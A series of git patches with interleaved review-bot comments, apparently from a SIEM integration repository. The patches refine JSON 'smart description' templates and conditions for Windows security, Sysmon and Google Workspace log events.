 {
 "field": "winlog.provider_guid",
 "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
- },
- {
- "field": "winlog.computer_name"
- },
- {
- "field": "winlog.SubjectUserSid"
- },
- {
- "field": "event.action"
 }
 ]
 },
@@ -1171,15 +1156,6 @@
 {
 "field": "event.action",
 "value": "Filtering Platform Connection"
- },
- {
- "field": "winlog.computer_name"
- },
- {
- "field": "winlog.event_data.SourceAddress"
- },
- {
- "field": "winlog.event_data.DestAddress"
 }
 ]
 },
@@ -1189,12 +1165,6 @@
 {
 "field": "winlog.provider_guid",
 "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}"
- },
- {
- "field": "host.hostname"
- },
- {
- "field": "event.original"
 }
 ]
 },
@@ -1204,12 +1174,6 @@
 {
 "field": "winlog.provider_guid",
 "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"
- },
- {
- "field": "winlog.opcode"
- },
- {
- "field": "winlog.computer_name"
 }
 ]
 },
@@ -1219,9 +1183,6 @@
 {
 "field": "winlog.provider_guid",
 "value": "{00000000-0000-0000-0000-000000000000}"
- },
- {
- "field": "winlog.computer_name"
 }
 ]
 },
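Review bot: Several new entries carry typos in field paths or relationship types that will never resolve: the 4688 entry targets `"jost.hostname"` instead of `host.hostname`, the 5156 value interpolates `{action.properties.DestAdress}` while its own relationship uses `action.properties.DestAddress`, the 4825 relationship type reads `"wad denied RDP access to"`, and the 4768 type `"failed to log authenticate from"` has a word too many. For 4768, 4769, 5140 and 5145 the entry with no `action.outcome` condition is listed before the one that requires it (4768/4769: failure wording first, success entry second; 5140/5145: success wording first, failure entry second), and the same pattern holds for the 4624/4625 entries without `source.ip` preceding the ones with it, so if the engine takes the first matching entry the more specific description is never selected — adding the complementary `action.outcome` condition to the unconditioned entry, as the 4723 and 4776 pairs already do, or ordering the specific entries first removes the ambiguity; please confirm which matching rule the engine applies. The host name is taken from `{host.hostname}` in the 4798 entry but from `{log.hostname}` in the 4799, 4825 and Sysmon 12 entries; the file should settle on one field for the same concept. The hunk starts at the first line of the file and the JSON array it extends continues past the hunk.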
@@ -1231,12 +1192,6 @@
 {
 "field": "winlog.provider_guid",
 "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"
- },
- {
- "field": "event.action"
- },
- {
- "field": "winlog.computer_name"
 }
 ]
 },
@@ -1246,12 +1201,6 @@
 {
 "field": "event.module",
 "value": "powershell"
- },
- {
- "field": "event.action"
- },
- {
- "field": "winlog.computer_name"
 }
 ]
 },
From 60cfdc0bd0210d65b78ff4ef5cdbb8b25c7dcfc7 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 14 Nov 2024 17:58:27 +0100
Subject: [PATCH 233/317] Fixing details in smart description to avoid NULL
---
 .../winlogbeat/_meta/smart-descriptions.json | 426 ++++++++++++++++++
 1 file changed, 426 insertions(+)
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index a3b786729..ee074adf6 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -668,6 +668,158 @@ } ] }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] 
+ }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", "relationships": [ @@ -693,6 +845,9 @@ }, { "field": "source.ip" + }, + { + "field":"host.hostname" } ] }, @@ -776,6 +931,26 @@ } ] }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", "relationships": [ 
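Review bot: The two new `... on {host.hostname}` variants for event 4778 (the `{user.name}` one and the `{user.domain}\\{user.name}` one) keep a relationship `user.name -> source.ip` of type `reconnected from`, yet their conditions do not require `source.ip` and the rendered text never shows it, so the edge points at a field the entry never asserts; drop that relationship object from both, as the plain `reconnected on session` variants already do. Both of those entries, and the one in the `@@ -693` hunk, also write `"field":"host.hostname"` without the space used by every other condition in the file. The new, less specific entries are inserted ahead of the existing `on {host.hostname} from {source.ip}` one, and the 4964 hunk below does the same; if the engine picks the first entry whose conditions match, events carrying every field will get the shorter text, so either the order or the selection rule deserves a comment at the top of the file.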
@@ -793,6 +968,9 @@
 {
 "field": "event.provider",
 "value": "Microsoft-Windows-Security-Auditing"
+ },
+ {
+ "field": "host.hostname"
 }
 ]
 },
@@ -969,6 +1147,191 @@ } ] }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + 
"target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, { "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", "relationships": [ @@ -1011,6 +1374,18 @@ { "field": "event.provider", "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, 
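Review bot: In the four new Sysmon process-creation entries the child `uses executable` edge targets `process.executable` while the parent one targets `process.parent.name`, so the two edges of the same type point at different kinds of value (a full path versus a bare file name); if the parser populates `process.parent.executable`, target it here, otherwise the asymmetry should be stated in the field documentation so graph consumers do not join the two. The relationships also reference `process.command_line` and `process.parent.command_line`, which none of the added conditions require, so on events where Sysmon logged no command line the edges have an empty endpoint — worth confirming how the engine treats that, given this commit's stated goal of avoiding NULL. As with the 4778 entries, the less specific variants are placed before the existing `created by {user.domain}\\{user.name} on {host.name}` one, which only works if selection prefers the most specific match rather than the first.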
@@ -1148,6 +1523,57 @@ }, { "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress} to {winlog.event_data.DestAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.SourceAddress" + }, + { + "field": "winlog.event_data.DestAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.SourceAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.DestAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name}", "conditions": [ { "field": "winlog.provider_guid", From 1e1d1a72d4c376dd3741994d319e44d0a33c2795 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 18:03:25 +0100 Subject: [PATCH 234/317] small fix --- Beats/winlogbeat/_meta/smart-descriptions.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index ee074adf6..b3a3257b7 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -16,6 +16,9 @@ { "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" } ] }, 
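Review bot: Every `Filtering connection ...` template still interpolates `{winlog.computer_name}`, but none of the four variants lists `winlog.computer_name` among its conditions (the `@@ -1171` hunk of the previous commit removed it), so an event without that field renders exactly the gap this commit's title says it closes; add `{ "field": "winlog.computer_name" }` to each variant, or provide a host-less variant as was done for the 4778 entries. These entries key on `winlog.provider_guid` while the ones above key on `event.provider`, which makes the file's selection logic harder to audit than it needs to be. The last variant's conditions continue outside the hunk.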
@@ -42,6 +45,9 @@ "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" }, + { + "field": "action.properties.LogonType" + }, { "field": "source.ip" } From 5a3e4861db9637ed8dcc5b49ebbcf8cfce42586b Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 18:10:35 +0100 Subject: [PATCH 235/317] change from event.provider to winlog.provider_name --- .../winlogbeat/_meta/smart-descriptions.json | 130 +++++++++--------- 1 file changed, 65 insertions(+), 65 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b3a3257b7..b720b4ffb 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -14,7 +14,7 @@ "value": 4624 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -42,7 +42,7 @@ "value": 4624 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -68,7 +68,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -88,7 +88,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -113,7 +113,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -136,7 +136,7 @@ "value": 4634 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -156,7 +156,7 @@ "value": 4648 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -176,7 +176,7 @@ "value": 4648 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { 
@@ -200,7 +200,7 @@ "value": 4662 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -220,7 +220,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -240,7 +240,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -285,7 +285,7 @@ "value": 4688 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -305,7 +305,7 @@ "value": 4689 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -325,7 +325,7 @@ "value": 4720 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -345,7 +345,7 @@ "value": 4722 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -365,7 +365,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -389,7 +389,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -413,7 +413,7 @@ "value": 4725 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -433,7 +433,7 @@ "value": 4726 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -453,7 +453,7 @@ "value": 4727 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] 
@@ -473,7 +473,7 @@ "value": 4742 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -493,7 +493,7 @@ "value": 4744 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -513,7 +513,7 @@ "value": 4750 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -533,7 +533,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -553,7 +553,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -577,7 +577,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -597,7 +597,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -621,7 +621,7 @@ "value": 4771 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -641,7 +641,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -665,7 +665,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -694,7 +694,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -722,7 +722,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { 
@@ -745,7 +745,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -770,7 +770,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -798,7 +798,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -821,7 +821,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -846,7 +846,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -872,7 +872,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -892,7 +892,7 @@ "value": 4798 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -912,7 +912,7 @@ "value": 4799 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -932,7 +932,7 @@ "value": 4825 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -952,7 +952,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -972,7 +972,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -995,7 +995,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] 
@@ -1015,7 +1015,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1039,7 +1039,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1059,7 +1059,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1083,7 +1083,7 @@ "value": 5156 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1096,7 +1096,7 @@ "value": 4103 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1109,7 +1109,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1122,7 +1122,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1135,7 +1135,7 @@ "value": 4105 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1148,7 +1148,7 @@ "value": 4106 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1183,7 +1183,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1224,7 +1224,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1278,7 +1278,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1327,7 +1327,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { 
@@ -1378,7 +1378,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1415,7 +1415,7 @@ "value": 2 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1435,7 +1435,7 @@ "value": 3 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1448,7 +1448,7 @@ "value": 11 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1465,7 +1465,7 @@ "value": "CreateValue" }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1478,7 +1478,7 @@ "value": 13 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1491,7 +1491,7 @@ "value": 16 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1504,7 +1504,7 @@ "value": 22 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] From b1252eaca9c4f4450874f6f8943795476e8ed8e3 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:36:26 +0100 Subject: [PATCH 236/317] apply linter --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 0e522bee5..ded77dffa 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + google.report.saml.application_name: description: Saml SP application name name: google.report.saml.application_name From 19a65a4d5e293e1d2fdbfa64529dc10caee206c9 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:40:52 +0100 Subject: [PATCH 237/317] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 4cf8bb8e7..9e00ad24a 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -215,6 +215,10 @@ }, { "field": "google.report.rule.type" + } + ] + }, + { "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", "conditions": [ { From 9ff46d902883e220abb1678fe65f6151d46ab06c Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:44:32 +0100 Subject: [PATCH 238/317] Fix fields --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ded77dffa..21d6f4ee1 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + type: keyword google.report.saml.application_name: description: Saml SP application name From c99c1228b8eba92184a6a6ca972ffea8034cd286 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 15 Nov 2024 12:03:00 +0100 Subject: [PATCH 239/317] test(Wallix): remove useless test --- Wallix/wallix-bastion/tests/rexec.json | 12 ------------ 1 file changed, 12 deletions(-) delete mode 100644 Wallix/wallix-bastion/tests/rexec.json diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json deleted file mode 100644 index 14e87bd1a..000000000 
--- a/Wallix/wallix-bastion/tests/rexec.json +++ /dev/null @@ -1,12 +0,0 @@ -{ - "input": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation" - }, - "expected": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } -} \ No newline at end of file From 3c5145e8f49c9fd9c07d4f2af1d4cf491bdbbc35 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:25:48 +0100 Subject: [PATCH 240/317] Add chrome service --- .../_meta/smart-descriptions.json | 57 +++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++++++ .../tests/test_chrome_sample_1.json | 47 +++++++++++++++ .../tests/test_chrome_sample_2.json | 45 +++++++++++++++ 4 files changed, 169 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_2.json diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6fa8c709a..0ac5acfe5 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json 
@@ -282,6 +282,63 @@ } ] }, + { + "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.id" + } + ] + }, + { + "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, + { + "value": "The user on device model {device.model.name} log in due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 3a0fce88f..c92e4bf32 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -30,6 +30,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "vault"}}' - name: set_saml_fields filter: '{{ json_event.message.id.applicationName == "saml"}}' + - name: set_chrome_fields + filter: '{{ json_event.message.id.applicationName == "chrome"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' 
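Review bot: `The user on device model {device.model.name} log in due to {event.reason}` has a tense error; since the conditions pin `event.action` to `CHROME_OS_LOGIN_EVENT`, the sibling of the logout template should read `"value": "The user on device model {device.model.name} logged in due to {event.reason}"`. The peripheral template's `is {event.action}` interpolates the raw constant `CHROMEOS_PERIPHERAL_STATUS_UPDATED` into prose even though the condition already fixes that value; a phrase such as `"value": "Device {device.model.name} with ID {device.id} had its peripheral status updated in the {network.application} application"` reads as a sentence and matches the style of the surrounding entries.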
